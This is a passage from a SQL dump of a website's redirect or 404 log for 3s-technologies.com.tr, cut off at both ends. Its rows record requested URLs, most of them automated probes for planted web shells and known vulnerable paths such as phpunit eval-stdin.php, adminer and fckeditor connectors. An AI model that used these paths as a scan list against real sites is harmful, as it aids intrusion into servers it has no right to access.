16:35:40','0000-00-00 00:00:00',301),(56947,'http://3s-technologies.com.tr/tr/x9.php',NULL,'','',3,0,'2026-02-07 16:35:41','0000-00-00 00:00:00',301),(56948,'http://3s-technologies.com.tr/tr/byel.php',NULL,'','',1,0,'2026-02-07 16:35:42','0000-00-00 00:00:00',301),(56949,'http://3s-technologies.com.tr/tr/layou.php',NULL,'','',1,0,'2026-02-07 16:35:42','0000-00-00 00:00:00',301),(56950,'http://3s-technologies.com.tr/tr/lgsts.php',NULL,'','',1,0,'2026-02-07 16:35:43','0000-00-00 00:00:00',301),(56951,'http://3s-technologies.com.tr/tr/yvtuizub.php',NULL,'','',1,0,'2026-02-07 16:35:45','0000-00-00 00:00:00',301),(56952,'http://3s-technologies.com.tr/tr/inege.php',NULL,'','',72,0,'2026-02-07 16:35:46','0000-00-00 00:00:00',301),(56953,'http://3s-technologies.com.tr/tr/dialog.php',NULL,'','',6,0,'2026-02-07 22:49:41','0000-00-00 00:00:00',301),(56954,'http://3s-technologies.com.tr/tr/ws.php.php',NULL,'','',2,0,'2026-02-07 22:50:17','0000-00-00 00:00:00',301),(56955,'http://3s-technologies.com.tr/tr/issue.php',NULL,'','',3,0,'2026-02-07 22:50:30','0000-00-00 00:00:00',301),(56956,'http://3s-technologies.com.tr/tr/verify.php',NULL,'','',3,0,'2026-02-07 22:50:54','0000-00-00 00:00:00',301),(56957,'http://3s-technologies.com.tr/tr/wp-configss.php',NULL,'','',3,0,'2026-02-07 22:50:58','0000-00-00 00:00:00',301),(56958,'http://3s-technologies.com.tr/tr/elfinderconnector.class.php',NULL,'','',1,0,'2026-02-07 22:51:10','0000-00-00 00:00:00',301),(56959,'http://mail.3s-technologies.com.tr/tr/grsiuk.php',NULL,'','',32,0,'2026-02-08 00:48:59','0000-00-00 00:00:00',301),(56960,'http://mail.3s-technologies.com.tr/tr/;k.php',NULL,'','',3,0,'2026-02-08 00:49:00','0000-00-00 00:00:00',301),(56961,'http://mail.3s-technologies.com.tr/tr/zaa.php',NULL,'','',2,0,'2026-02-08 03:57:59','0000-00-00 00:00:00',301),(56962,'http://mail.3s-technologies.com.tr/tr/fetch.php',NULL,'','',21,0,'2026-02-08 03:58:02','0000-00-00 00:00:00',301),(56963,'http://mail.3s-technologies.com.tr/tr/errw.php',NULL,'','',3,0,'2026-02-08 03:58:11','0000-00-00 00:00:00',301),(56964,'http://mail.3s-technologies.com.tr/tr/lp6.php',NULL,'','',19,0,'2026-02-08 03:58:15','0000-00-00 00:00:00',301),(56965,'http://mail.3s-technologies.com.tr/tr/ole.php',NULL,'','',2,0,'2026-02-08 03:58:38','0000-00-00 00:00:00',301),(56966,'http://mail.3s-technologies.com.tr/tr/ak.php',NULL,'','',8,0,'2026-02-08 03:58:39','0000-00-00 00:00:00',301),(56967,'http://mail.3s-technologies.com.tr/tr/ellv3.php',NULL,'','',2,0,'2026-02-08 03:58:41','0000-00-00 00:00:00',301),(56968,'http://mail.3s-technologies.com.tr/tr/ffd.php',NULL,'','',7,0,'2026-02-08 03:58:42','0000-00-00 00:00:00',301),(56969,'http://mail.3s-technologies.com.tr/tr/x_3.php',NULL,'','',2,0,'2026-02-08 03:58:43','0000-00-00 00:00:00',301),(56970,'http://mail.3s-technologies.com.tr/tr/wp_wlx.php',NULL,'','',3,0,'2026-02-08 03:58:44','0000-00-00 00:00:00',301),(56971,'http://mail.3s-technologies.com.tr/tr/mal.php',NULL,'','',2,0,'2026-02-08 03:58:52','0000-00-00 00:00:00',301),(56972,'http://mail.3s-technologies.com.tr/tr/ph33w.php',NULL,'','',3,0,'2026-02-08 03:58:54','0000-00-00 00:00:00',301),(56973,'http://mail.3s-technologies.com.tr/tr/cv.php',NULL,'','',2,0,'2026-02-08 03:58:55','0000-00-00 00:00:00',301),(56974,'http://3s-technologies.com.tr/tr/h02ugyh.php',NULL,'','',17,0,'2026-02-08 06:55:56','0000-00-00 00:00:00',301),(56975,'http://3s-technologies.com.tr/tr/cxc.php',NULL,'','',9,0,'2026-02-08 06:56:05','0000-00-00 00:00:00',301),(56976,'http://3s-technologies.com.tr/tr/a332.php',NULL,'','',8,0,'2026-02-08 06:56:07','0000-00-00 00:00:00',301),(56977,'http://3s-technologies.com.tr/tr/z-ehp.php',NULL,'','',2,0,'2026-02-08 06:56:08','0000-00-00 00:00:00',301),(56978,'http://3s-technologies.com.tr/tr/xy.php',NULL,'','',27,0,'2026-02-08 06:56:12','0000-00-00 00:00:00',301),(56979,'http://3s-technologies.com.tr/tr/sc.php',NULL,'','',49,0,'2026-02-08 06:56:16','0000-00-00 00:00:00',301),(56980,'http://3s-technologies.com.tr/tr/system123.php',NULL,'','',2,0,'2026-02-08 06:56:17','0000-00-00 00:00:00',301),(56981,'http://3s-technologies.com.tr/tr/kjh.php',NULL,'','',2,0,'2026-02-08 06:56:17','0000-00-00 00:00:00',301),(56982,'http://3s-technologies.com.tr/tr/koiy.php',NULL,'','',21,0,'2026-02-08 06:56:22','0000-00-00 00:00:00',301),(56983,'http://3s-technologies.com.tr/tr/bwiau.php',NULL,'','',2,0,'2026-02-08 06:56:26','0000-00-00 00:00:00',301),(56984,'http://3s-technologies.com.tr/tr/asz.php',NULL,'','',2,0,'2026-02-08 06:56:31','0000-00-00 00:00:00',301),(56985,'http://3s-technologies.com.tr/tr/zrneoofb.php',NULL,'','',2,0,'2026-02-08 06:56:32','0000-00-00 00:00:00',301),(56986,'http://3s-technologies.com.tr/tr/fetch.php',NULL,'','',37,0,'2026-02-08 06:56:32','0000-00-00 00:00:00',301),(56987,'http://3s-technologies.com.tr/tr/lbmd5v5t.php',NULL,'','',2,0,'2026-02-08 06:56:34','0000-00-00 00:00:00',301),(56988,'http://www.3s-technologies.com.tr/tr/grsiuk.php',NULL,'','',10,0,'2026-02-08 07:02:45','0000-00-00 00:00:00',301),(56989,'http://www.3s-technologies.com.tr/tr/;k.php',NULL,'','',1,0,'2026-02-08 07:02:46','0000-00-00 00:00:00',301),(56990,'http://3s-technologies.com.tr/tr/zaa.php',NULL,'','',4,0,'2026-02-08 07:11:24','0000-00-00 00:00:00',301),(56991,'http://3s-technologies.com.tr/tr/errw.php',NULL,'','',6,0,'2026-02-08 07:11:43','0000-00-00 00:00:00',301),(56992,'http://3s-technologies.com.tr/tr/lp6.php',NULL,'','',49,0,'2026-02-08 07:11:50','0000-00-00 00:00:00',301),(56993,'http://3s-technologies.com.tr/tr/geforce.php',NULL,'','',44,0,'2026-02-08 07:12:10','0000-00-00 00:00:00',301),(56994,'http://3s-technologies.com.tr/tr/ole.php',NULL,'','',4,0,'2026-02-08 07:12:26','0000-00-00 00:00:00',301),(56995,'http://3s-technologies.com.tr/tr/ellv3.php',NULL,'','',4,0,'2026-02-08 07:12:31','0000-00-00 00:00:00',301),(56996,'http://3s-technologies.com.tr/tr/x_3.php',NULL,'','',4,0,'2026-02-08 07:12:36','0000-00-00 00:00:00',301),(56997,'http://3s-technologies.com.tr/tr/wp_wlx.php',NULL,'','',6,0,'2026-02-08 07:12:37','0000-00-00 00:00:00',301),(56998,'http://3s-technologies.com.tr/tr/mal.php',NULL,'','',4,0,'2026-02-08 07:12:51','0000-00-00 00:00:00',301),(56999,'http://3s-technologies.com.tr/tr/cv.php',NULL,'','',5,0,'2026-02-08 07:12:57','0000-00-00 00:00:00',301),(57000,'http://3s-technologies.com.tr/tr/edit.phphttps:/win55.bike/ioxi-o.php',NULL,'','',3,0,'2026-02-08 14:21:28','0000-00-00 00:00:00',301),(57001,'http://3s-technologies.com.tr/tr/ioxi-o.phphttps:/forower.io/ioxi-o.php',NULL,'','',3,0,'2026-02-08 14:21:54','0000-00-00 00:00:00',301),(57002,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024',NULL,'','',5,0,'2026-02-08 14:22:19','0000-00-00 00:00:00',301),(57003,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/index.php',NULL,'','',3,0,'2026-02-08 14:22:49','0000-00-00 00:00:00',301),(57004,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpsearch/login.php',NULL,'','',3,0,'2026-02-08 14:22:50','0000-00-00 00:00:00',301),(57005,'http://3s-technologies.com.tr/tr/wp-content/ai1wm-backups',NULL,'','',3,0,'2026-02-08 14:22:54','0000-00-00 00:00:00',301),(57006,'http://3s-technologies.com.tr/tr/admin.phphttps:/www-vn500.com/inputs.php',NULL,'','',3,0,'2026-02-08 14:23:28','0000-00-00 00:00:00',301),(57007,'http://3s-technologies.com.tr/tr/wp-content/et-cache',NULL,'','',3,0,'2026-02-08 14:23:51','0000-00-00 00:00:00',301),(57008,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/admin.php',NULL,'','',3,0,'2026-02-08 14:24:04','0000-00-00 00:00:00',301),(57009,'http://3s-technologies.com.tr/tr/server.status',NULL,'','',2,0,'2026-02-08 14:24:05','0000-00-00 00:00:00',301),(57010,'http://mail.3s-technologies.com.tr/tr/plugin.php',NULL,'','',18,0,'2026-02-08 18:06:50','0000-00-00 00:00:00',301),(57011,'http://mail.3s-technologies.com.tr/tr/ioxi002.php7',NULL,'','',2,0,'2026-02-08 18:06:52','0000-00-00 00:00:00',301),(57012,'http://mail.3s-technologies.com.tr/tr/dialog.php',NULL,'','',2,0,'2026-02-08 18:07:28','0000-00-00 00:00:00',301),(57013,'http://mail.3s-technologies.com.tr/tr/app/webroot/filemanager.php',NULL,'','',3,0,'2026-02-08 18:07:35','0000-00-00 00:00:00',301),(57014,'http://mail.3s-technologies.com.tr/tr/configs.php',NULL,'','',1,0,'2026-02-08 18:07:41','0000-00-00 00:00:00',301),(57015,'http://3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/g/e/e/a/casper.php',NULL,'','',3,0,'2026-02-08 22:12:32','0000-00-00 00:00:00',301),(57016,'http://3s-technologies.com.tr/tr/wordpress/update/wpupex.php',NULL,'','',3,0,'2026-02-08 22:12:34','0000-00-00 00:00:00',301),(57017,'http://3s-technologies.com.tr/tr/wp/wp-content/plugins/classic-editor/js/geido.php',NULL,'','',3,0,'2026-02-08 22:12:37','0000-00-00 00:00:00',301),(57018,'http://3s-technologies.com.tr/tr/wp-content/halo.php',NULL,'','',3,0,'2026-02-08 22:12:38','0000-00-00 00:00:00',301),(57019,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/assets/css/geido.php',NULL,'','',3,0,'2026-02-08 22:12:39','0000-00-00 00:00:00',301),(57020,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/upload.php',NULL,'','',3,0,'2026-02-08 22:12:41','0000-00-00 00:00:00',301),(57021,'http://3s-technologies.com.tr/tr/dapa.php',NULL,'','',3,0,'2026-02-08 22:12:43','0000-00-00 00:00:00',301),(57022,'http://3s-technologies.com.tr/tr/ws64.php',NULL,'','',1,0,'2026-02-09 01:45:02','0000-00-00 00:00:00',301),(57023,'http://3s-technologies.com.tr/tr/bay11.php',NULL,'','',1,0,'2026-02-09 01:45:03','0000-00-00 00:00:00',301),(57024,'http://3s-technologies.com.tr/tr/zc-845.php',NULL,'','',1,0,'2026-02-09 01:45:05','0000-00-00 00:00:00',301),(57025,'http://3s-technologies.com.tr/tr/wsdxoeas.php',NULL,'','',1,0,'2026-02-09 01:45:06','0000-00-00 00:00:00',301),(57026,'http://3s-technologies.com.tr/tr/timocra.php',NULL,'','',1,0,'2026-02-09 01:45:14','0000-00-00 00:00:00',301),(57027,'http://3s-technologies.com.tr/tr/w3llscc.php7',NULL,'','',2,0,'2026-02-09 01:45:20','0000-00-00 00:00:00',301),(57028,'http://3s-technologies.com.tr/tr/wp-shirei.php',NULL,'','',1,0,'2026-02-09 01:45:23','0000-00-00 00:00:00',301),(57029,'http://3s-technologies.com.tr/tr/htio.php',NULL,'','',1,0,'2026-02-09 01:45:30','0000-00-00 00:00:00',301),(57030,'http://3s-technologies.com.tr/tr/wp-ann.php',NULL,'','',1,0,'2026-02-09 01:46:01','0000-00-00 00:00:00',301),(57031,'http://3s-technologies.com.tr/tr/yawa.php',NULL,'','',11,0,'2026-02-09 01:46:03','0000-00-00 00:00:00',301),(57032,'http://3s-technologies.com.tr/tr/ziwopudm.php',NULL,'','',1,0,'2026-02-09 01:46:07','0000-00-00 00:00:00',301),(57033,'http://3s-technologies.com.tr/tr/cczkdmdy.php',NULL,'','',1,0,'2026-02-09 01:46:12','0000-00-00 00:00:00',301),(57034,'http://3s-technologies.com.tr/tr/wbbw.php',NULL,'','',3,0,'2026-02-09 01:46:13','0000-00-00 00:00:00',301),(57035,'http://3s-technologies.com.tr/tr/living.php',NULL,'','',1,0,'2026-02-09 01:46:28','0000-00-00 00:00:00',301),(57036,'http://3s-technologies.com.tr/tr/yaiid.php',NULL,'','',2,0,'2026-02-09 01:46:32','0000-00-00 00:00:00',301),(57037,'http://3s-technologies.com.tr/tr/zzxy.php',NULL,'','',2,0,'2026-02-09 01:46:34','0000-00-00 00:00:00',301),(57038,'http://3s-technologies.com.tr/tr/wp-4doption1.php',NULL,'','',4,0,'2026-02-09 01:46:38','0000-00-00 00:00:00',301),(57039,'http://3s-technologies.com.tr/tr/wp-ait.php',NULL,'','',1,0,'2026-02-09 01:47:00','0000-00-00 00:00:00',301),(57040,'http://3s-technologies.com.tr/tr/xxm.php',NULL,'','',1,0,'2026-02-09 01:47:03','0000-00-00 00:00:00',301),(57041,'http://3s-technologies.com.tr/tr/w3lls.php7',NULL,'','',2,0,'2026-02-09 01:47:06','0000-00-00 00:00:00',301),(57042,'http://3s-technologies.com.tr/tr/yifsx.php',NULL,'','',2,0,'2026-02-09 01:47:11','0000-00-00 00:00:00',301),(57043,'http://3s-technologies.com.tr/tr/lock2.php',NULL,'','',1,0,'2026-02-09 01:47:26','0000-00-00 00:00:00',301),(57044,'http://mail.3s-technologies.com.tr/tr/nw.php',NULL,'','',35,0,'2026-02-09 03:57:46','0000-00-00 00:00:00',301),(57045,'http://mail.3s-technologies.com.tr/tr/nnyvn.php',NULL,'','',4,0,'2026-02-09 03:57:47','0000-00-00 00:00:00',301),(57046,'http://mail.3s-technologies.com.tr/tr/cu.php',NULL,'','',28,0,'2026-02-09 03:57:47','0000-00-00 00:00:00',301),(57047,'http://mail.3s-technologies.com.tr/tr/lul.php',NULL,'','',4,0,'2026-02-09 03:57:48','0000-00-00 00:00:00',301),(57048,'http://mail.3s-technologies.com.tr/tr/lp5.php',NULL,'','',2,0,'2026-02-09 03:57:49','0000-00-00 00:00:00',301),(57049,'http://mail.3s-technologies.com.tr/tr/ee8.php',NULL,'','',1,0,'2026-02-09 03:57:50','0000-00-00 00:00:00',301),(57050,'http://mail.3s-technologies.com.tr/tr/v2_xml.php',NULL,'','',1,0,'2026-02-09 03:57:51','0000-00-00 00:00:00',301),(57051,'http://mail.3s-technologies.com.tr/tr/ya.php',NULL,'','',4,0,'2026-02-09 03:57:51','0000-00-00 00:00:00',301),(57052,'http://mail.3s-technologies.com.tr/tr/xmff.php',NULL,'','',1,0,'2026-02-09 03:57:52','0000-00-00 00:00:00',301),(57053,'http://mail.3s-technologies.com.tr/tr/ftem.php',NULL,'','',1,0,'2026-02-09 03:57:53','0000-00-00 00:00:00',301),(57054,'http://mail.3s-technologies.com.tr/tr/ova-simple.php',NULL,'','',1,0,'2026-02-09 03:57:54','0000-00-00 00:00:00',301),(57055,'http://mail.3s-technologies.com.tr/tr/wp-access.php',NULL,'','',26,0,'2026-02-09 03:57:54','0000-00-00 00:00:00',301),(57056,'http://mail.3s-technologies.com.tr/tr/a1vx.php',NULL,'','',11,0,'2026-02-09 03:57:55','0000-00-00 00:00:00',301),(57057,'http://mail.3s-technologies.com.tr/tr/sbhu.php',NULL,'','',41,0,'2026-02-09 03:57:56','0000-00-00 00:00:00',301),(57058,'http://mail.3s-technologies.com.tr/tr/wp-the.php',NULL,'','',55,0,'2026-02-09 03:57:56','0000-00-00 00:00:00',301),(57059,'http://mail.3s-technologies.com.tr/tr/wp5.php',NULL,'','',34,0,'2026-02-09 03:57:58','0000-00-00 00:00:00',301),(57060,'http://mail.3s-technologies.com.tr/tr/fot.php',NULL,'','',5,0,'2026-02-09 03:58:00','0000-00-00 00:00:00',301),(57061,'http://mail.3s-technologies.com.tr/tr/x--krood.php',NULL,'','',1,0,'2026-02-09 03:58:00','0000-00-00 00:00:00',301),(57062,'http://mail.3s-technologies.com.tr/tr/ff1.php',NULL,'','',35,0,'2026-02-09 03:58:01','0000-00-00 00:00:00',301),(57063,'http://mail.3s-technologies.com.tr/tr/forbidals.php',NULL,'','',13,0,'2026-02-09 03:58:02','0000-00-00 00:00:00',301),(57064,'http://mail.3s-technologies.com.tr/tr/vdb.php',NULL,'','',2,0,'2026-02-09 03:58:02','0000-00-00 00:00:00',301),(57065,'http://mail.3s-technologies.com.tr/tr/erty.php',NULL,'','',32,0,'2026-02-09 03:58:03','0000-00-00 00:00:00',301),(57066,'http://mail.3s-technologies.com.tr/tr/prv8.php',NULL,'','',14,0,'2026-02-09 03:58:16','0000-00-00 00:00:00',301),(57067,'http://mail.3s-technologies.com.tr/tr/i.php',NULL,'','',9,0,'2026-02-09 03:58:19','0000-00-00 00:00:00',301),(57068,'http://mail.3s-technologies.com.tr/tr/199.php',NULL,'','',1,0,'2026-02-09 03:58:25','0000-00-00 00:00:00',301),(57069,'http://mail.3s-technologies.com.tr/tr/ov.php',NULL,'','',2,0,'2026-02-09 03:58:28','0000-00-00 00:00:00',301),(57070,'http://mail.3s-technologies.com.tr/tr/188.php',NULL,'','',1,0,'2026-02-09 03:58:40','0000-00-00 00:00:00',301),(57071,'http://mail.3s-technologies.com.tr/tr/xfile25.php',NULL,'','',3,0,'2026-02-09 03:58:49','0000-00-00 00:00:00',301),(57072,'http://mail.3s-technologies.com.tr/tr/122.php',NULL,'','',1,0,'2026-02-09 03:58:50','0000-00-00 00:00:00',301),(57073,'http://mail.3s-technologies.com.tr/tr/fi.php',NULL,'','',25,0,'2026-02-09 03:58:51','0000-00-00 00:00:00',301),(57074,'http://mail.3s-technologies.com.tr/tr/thebe.php',NULL,'','',2,0,'2026-02-09 03:58:55','0000-00-00 00:00:00',301),(57075,'http://mail.3s-technologies.com.tr/tr/ddd.php',NULL,'','',3,0,'2026-02-09 03:58:56','0000-00-00 00:00:00',301),(57076,'http://mail.3s-technologies.com.tr/tr/ccs.php',NULL,'','',26,0,'2026-02-09 03:58:56','0000-00-00 00:00:00',301),(57077,'http://mail.3s-technologies.com.tr/tr/f355.php',NULL,'','',1,0,'2026-02-09 03:58:57','0000-00-00 00:00:00',301),(57078,'http://mail.3s-technologies.com.tr/tr/xpwer1.php',NULL,'','',5,0,'2026-02-09 03:59:01','0000-00-00 00:00:00',301),(57079,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/wp-conflg.php',NULL,'','',17,0,'2026-02-09 03:59:04','0000-00-00 00:00:00',301),(57080,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie',NULL,'','',19,0,'2026-02-09 03:59:17','0000-00-00 00:00:00',301),(57081,'http://mail.3s-technologies.com.tr/tr/jane.php',NULL,'','',2,0,'2026-02-09 03:59:19','0000-00-00 00:00:00',301),(57082,'http://mail.3s-technologies.com.tr/tr/177.php',NULL,'','',1,0,'2026-02-09 03:59:38','0000-00-00 00:00:00',301),(57083,'http://mail.3s-technologies.com.tr/tr/admins.php',NULL,'','',2,0,'2026-02-09 03:59:38','0000-00-00 00:00:00',301),(57084,'http://mail.3s-technologies.com.tr/tr/main.php',NULL,'','',4,0,'2026-02-09 03:59:40','0000-00-00 00:00:00',301),(57085,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/cache/new.php',NULL,'','',1,0,'2026-02-09 04:44:47','0000-00-00 00:00:00',301),(57086,'http://mail.3s-technologies.com.tr/tr/b7.php',NULL,'','',1,0,'2026-02-09 04:44:48','0000-00-00 00:00:00',301),(57087,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/b3d394ki.php',NULL,'','',1,0,'2026-02-09 04:44:50','0000-00-00 00:00:00',301),(57088,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wp-doft/noimg.php',NULL,'','',1,0,'2026-02-09 04:44:51','0000-00-00 00:00:00',301),(57089,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/about.php',NULL,'','',7,0,'2026-02-09 04:44:52','0000-00-00 00:00:00',301),(57090,'http://mail.3s-technologies.com.tr/tr/ovakmrurz.php',NULL,'','',1,0,'2026-02-09 04:44:53','0000-00-00 00:00:00',301),(57091,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/alfa-rex.php7',NULL,'','',1,0,'2026-02-09 04:44:53','0000-00-00 00:00:00',301),(57092,'http://mail.3s-technologies.com.tr/tr/proxy.php',NULL,'','',1,0,'2026-02-09 04:44:55','0000-00-00 00:00:00',301),(57093,'http://mail.3s-technologies.com.tr/tr/cxc.php',NULL,'','',6,0,'2026-02-09 04:44:55','0000-00-00 00:00:00',301),(57094,'http://mail.3s-technologies.com.tr/tr/inege.php',NULL,'','',31,0,'2026-02-09 04:44:58','0000-00-00 00:00:00',301),(57095,'http://mail.3s-technologies.com.tr/tr/test/adminer-4.6.0-mysql.php',NULL,'','',1,0,'2026-02-09 04:44:59','0000-00-00 00:00:00',301),(57096,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/defaults.php',NULL,'','',1,0,'2026-02-09 04:45:00','0000-00-00 00:00:00',301),(57097,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/mod_ariimageslidersa.php',NULL,'','',1,0,'2026-02-09 04:45:01','0000-00-00 00:00:00',301),(57098,'http://mail.3s-technologies.com.tr/tr/.well-known/oduexytv.php',NULL,'','',1,0,'2026-02-09 04:45:01','0000-00-00 00:00:00',301),(57099,'http://mail.3s-technologies.com.tr/tr/asz.php',NULL,'','',1,0,'2026-02-09 04:45:02','0000-00-00 00:00:00',301),(57100,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/hdggn/post.php',NULL,'','',1,0,'2026-02-09 04:45:04','0000-00-00 00:00:00',301),(57101,'http://mail.3s-technologies.com.tr/tr/exec.php',NULL,'','',1,0,'2026-02-09 04:45:05','0000-00-00 00:00:00',301),(57102,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/include.php',NULL,'','',1,0,'2026-02-09 04:45:06','0000-00-00 00:00:00',301),(57103,'http://mail.3s-technologies.com.tr/tr/assets/js/server/php/index.php',NULL,'','',1,0,'2026-02-09 04:45:07','0000-00-00 00:00:00',301),(57104,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/plugins-dist.php',NULL,'','',1,0,'2026-02-09 04:45:08','0000-00-00 00:00:00',301),(57105,'http://mail.3s-technologies.com.tr/tr/bwiau.php',NULL,'','',1,0,'2026-02-09 04:45:10','0000-00-00 00:00:00',301),(57106,'http://mail.3s-technologies.com.tr/tr/vuln.php',NULL,'','',9,0,'2026-02-09 04:45:10','0000-00-00 00:00:00',301),(57107,'http://mail.3s-technologies.com.tr/tr/admin/adminer-4.2.1-mysql-en.php',NULL,'','',1,0,'2026-02-09 04:45:11','0000-00-00 00:00:00',301),(57108,'http://mail.3s-technologies.com.tr/tr/z-ehp.php',NULL,'','',1,0,'2026-02-09 04:45:12','0000-00-00 00:00:00',301),(57109,'http://mail.3s-technologies.com.tr/tr/.well-known/elp.php',NULL,'','',1,0,'2026-02-09 04:45:12','0000-00-00 00:00:00',301),(57110,'http://mail.3s-technologies.com.tr/tr/yonix/yonix.php',NULL,'','',1,0,'2026-02-09 04:45:13','0000-00-00 00:00:00',301),(57111,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-wp-query-href.php',NULL,'','',1,0,'2026-02-09 04:45:13','0000-00-00 00:00:00',301),(57112,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/dist/format-library/alfa-rex.php7',NULL,'','',1,0,'2026-02-09 04:45:13','0000-00-00 00:00:00',301),(57113,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/index.php',NULL,'','',2,0,'2026-02-09 04:45:14','0000-00-00 00:00:00',301),(57114,'http://mail.3s-technologies.com.tr/tr/wp-content/a.php',NULL,'','',1,0,'2026-02-09 04:45:15','0000-00-00 00:00:00',301),(57115,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-wp-http-cookie-set.php',NULL,'','',1,0,'2026-02-09 04:45:17','0000-00-00 00:00:00',301),(57116,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/fields/about.php',NULL,'','',1,0,'2026-02-09 04:45:17','0000-00-00 00:00:00',301),(57117,'http://mail.3s-technologies.com.tr/tr/sc.php',NULL,'','',29,0,'2026-02-09 04:45:18','0000-00-00 00:00:00',301),(57118,'http://mail.3s-technologies.com.tr/tr/2015/dup-installer/main.installer.php',NULL,'','',1,0,'2026-02-09 04:45:22','0000-00-00 00:00:00',301),(57119,'http://mail.3s-technologies.com.tr/tr/nagiosxi/login.php',NULL,'','',1,0,'2026-02-09 04:45:24','0000-00-00 00:00:00',301),(57120,'http://mail.3s-technologies.com.tr/tr/theme-templates.php',NULL,'','',1,0,'2026-02-09 04:45:25','0000-00-00 00:00:00',301),(57121,'http://mail.3s-technologies.com.tr/tr/sb.php',NULL,'','',1,0,'2026-02-09 04:45:25','0000-00-00 00:00:00',301),(57122,'http://mail.3s-technologies.com.tr/tr/@55/autodhl/dhl/index.php',NULL,'','',1,0,'2026-02-09 04:45:26','0000-00-00 00:00:00',301),(57123,'http://mail.3s-technologies.com.tr/tr/old/wp-admin/install.php',NULL,'','',1,0,'2026-02-09 04:45:28','0000-00-00 00:00:00',301),(57124,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/cong.php',NULL,'','',1,0,'2026-02-09 04:45:28','0000-00-00 00:00:00',301),(57125,'http://mail.3s-technologies.com.tr/tr/system123.php',NULL,'','',1,0,'2026-02-09 04:45:29','0000-00-00 00:00:00',301),(57126,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/content-post.php',NULL,'','',1,0,'2026-02-09 04:45:31','0000-00-00 00:00:00',301),(57127,'http://mail.3s-technologies.com.tr/tr/a332.php',NULL,'','',4,0,'2026-02-09 04:45:32','0000-00-00 00:00:00',301),(57128,'http://mail.3s-technologies.com.tr/tr/old/server/phpinfo.php',NULL,'','',1,0,'2026-02-09 04:45:33','0000-00-00 00:00:00',301),(57129,'http://mail.3s-technologies.com.tr/tr/js/adminer-3.5.1.php',NULL,'','',1,0,'2026-02-09 04:45:33','0000-00-00 00:00:00',301),(57130,'http://mail.3s-technologies.com.tr/tr/rwvri.php',NULL,'','',1,0,'2026-02-09 04:45:35','0000-00-00 00:00:00',301),(57131,'http://mail.3s-technologies.com.tr/tr/d9.php',NULL,'','',1,0,'2026-02-09 04:45:36','0000-00-00 00:00:00',301),(57132,'http://mail.3s-technologies.com.tr/tr/a4.php',NULL,'','',38,0,'2026-02-09 04:45:37','0000-00-00 00:00:00',301),(57133,'http://mail.3s-technologies.com.tr/tr/yuuki2.php',NULL,'','',1,0,'2026-02-09 04:45:37','0000-00-00 00:00:00',301),(57134,'http://mail.3s-technologies.com.tr/tr/zrneoofb.php',NULL,'','',1,0,'2026-02-09 04:45:38','0000-00-00 00:00:00',301),(57135,'http://mail.3s-technologies.com.tr/tr/payment/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2026-02-09 04:45:39','0000-00-00 00:00:00',301),(57136,'http://mail.3s-technologies.com.tr/tr/lbmd5v5t.php',NULL,'','',1,0,'2026-02-09 04:45:40','0000-00-00 00:00:00',301),(57137,'http://mail.3s-technologies.com.tr/tr/administrator/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',NULL,'','',1,0,'2026-02-09 04:45:41','0000-00-00 00:00:00',301),(57138,'http://mail.3s-technologies.com.tr/tr/admin/fckeditor/editor/filemanager/ioxi-o.php',NULL,'','',1,0,'2026-02-09 04:45:41','0000-00-00 00:00:00',301),(57139,'http://mail.3s-technologies.com.tr/tr/koiy.php',NULL,'','',16,0,'2026-02-09 04:45:42','0000-00-00 00:00:00',301),(57140,'http://mail.3s-technologies.com.tr/tr/user_panel.php',NULL,'','',1,0,'2026-02-09 04:45:44','0000-00-00 00:00:00',301),(57141,'http://mail.3s-technologies.com.tr/tr/info/backup/info.php',NULL,'','',1,0,'2026-02-09 04:45:45','0000-00-00 00:00:00',301),(57142,'http://mail.3s-technologies.com.tr/tr/upload/adminer-4.2.5.php',NULL,'','',1,0,'2026-02-09 04:45:48','0000-00-00 00:00:00',301),(57143,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/class-wp-pagebuilders-qhyrp8.php',NULL,'','',1,0,'2026-02-09 04:45:48','0000-00-00 00:00:00',301),(57144,'http://mail.3s-technologies.com.tr/tr/past1.php',NULL,'','',3,0,'2026-02-09 06:36:23','0000-00-00 00:00:00',301),(57145,'http://www.3s-technologies.com.tr/tr/past1.php',NULL,'','',1,0,'2026-02-09 13:22:18','0000-00-00 00:00:00',301),(57146,'http://www.3s-technologies.com.tr/tr/bk.php',NULL,'','',2,0,'2026-02-09 13:22:20','0000-00-00 00:00:00',301),(57147,'http://3s-technologies.com.tr/tr/site.jpa',NULL,'','',1,0,'2026-02-09 18:37:49','0000-00-00 00:00:00',301),(57148,'http://3s-technologies.com.tr/tr/parx.php',NULL,'','',4,0,'2026-02-10 07:14:11','0000-00-00 00:00:00',301),(57149,'http://3s-technologies.com.tr/tr/esyfvxgmdq.php',NULL,'','',1,0,'2026-02-10 07:14:29','0000-00-00 00:00:00',301),(57150,'http://3s-technologies.com.tr/tr/taptap-null.php',NULL,'','',2,0,'2026-02-10 07:14:47','0000-00-00 